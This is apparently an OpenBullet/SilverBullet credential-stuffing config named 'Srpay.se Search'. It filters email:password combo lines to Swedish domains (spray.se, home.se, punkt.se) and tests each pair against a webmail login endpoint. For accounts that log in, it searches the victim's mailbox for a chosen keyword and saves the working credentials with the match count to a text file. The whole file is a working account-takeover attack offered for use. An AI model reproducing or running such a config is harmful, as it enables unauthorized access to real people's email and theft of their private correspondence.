[SETTINGS]
{
  "Name": "Srpay.se Search",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2023-11-08T12:16:54.4000745+07:00",
  "AdditionalInfo": "@ntphong04",
  "RequiredPlugins": [],
  "Author": "",
  "Version": "1.1.4 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [
    {
      "Description": "Keyword",
      "VariableName": "kw",
      "Id": 742761709
    }
  ],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "Spay",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
FUNCTION Replace "@.*" "" UseRegex=TRUE "<USER>" -> VAR "US" 

PARSE "<USER>" LR "@" "" -> VAR "Domain" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "<Domain>" DoesNotContain "spray.se" 
    KEY "<Domain>" DoesNotContain "home.se" 
    KEY "<Domain>" DoesNotContain "punkt.se" 
  KEYCHAIN Success OR 
    KEY "<Domain>" Contains "spray.se" 
    KEY "<Domain>" Contains "home.se" 
    KEY "<Domain>" Contains "punkt.se" 

REQUEST POST "https://spray.pangia.biz/app/pageapi.asp" 
  CONTENT "api=signin&username=<US>&password=<PASS>&domaincode=spray&RememberMe=&domain=<Domain>&tz=2&ctime=6/13/2023%201%3A32%3A49" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Origin: https://spray.pangia.biz" 
  HEADER "Referer: https://spray.pangia.biz/app/" 
  HEADER "sec-ch-ua: \"Not_A Brand\";v=\"99\", \"Google Chrome\";v=\"109\", \"Chromium\";v=\"109\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 
  HEADER "X-Requested-With: XMLHttpRequest" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "<Msg>" Contains "Incorrect email or password." 
  KEYCHAIN Success OR 
    KEY "FirstName" 
    KEY "LastName" 

REQUEST GET "https://spray.pangia.biz/app/mail_search.asp?searchtxt=<kw>&options=false&field=full" 
  
  HEADER "Accept: */*" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: vi,en;q=0.9,en-US;q=0.8" 
  HEADER "Host: spray.pangia.biz" 
  HEADER "Referer: https://spray.pangia.biz/app/" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Edg/119.0.0.0" 
  HEADER "X-Requested-With: XMLHttpRequest" 
  HEADER "sec-ch-ua: \"Microsoft Edge\";v=\"119\", \"Chromium\";v=\"119\", \"Not?A_Brand\";v=\"24\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 

PARSE "<SOURCE>" JSON "mwcount" CreateEmpty=FALSE -> CAP "Total" 

UTILITY File "Result//Spray.se//<kw>.txt" AppendLines "<USER>:<PASS> --> <Total>" 

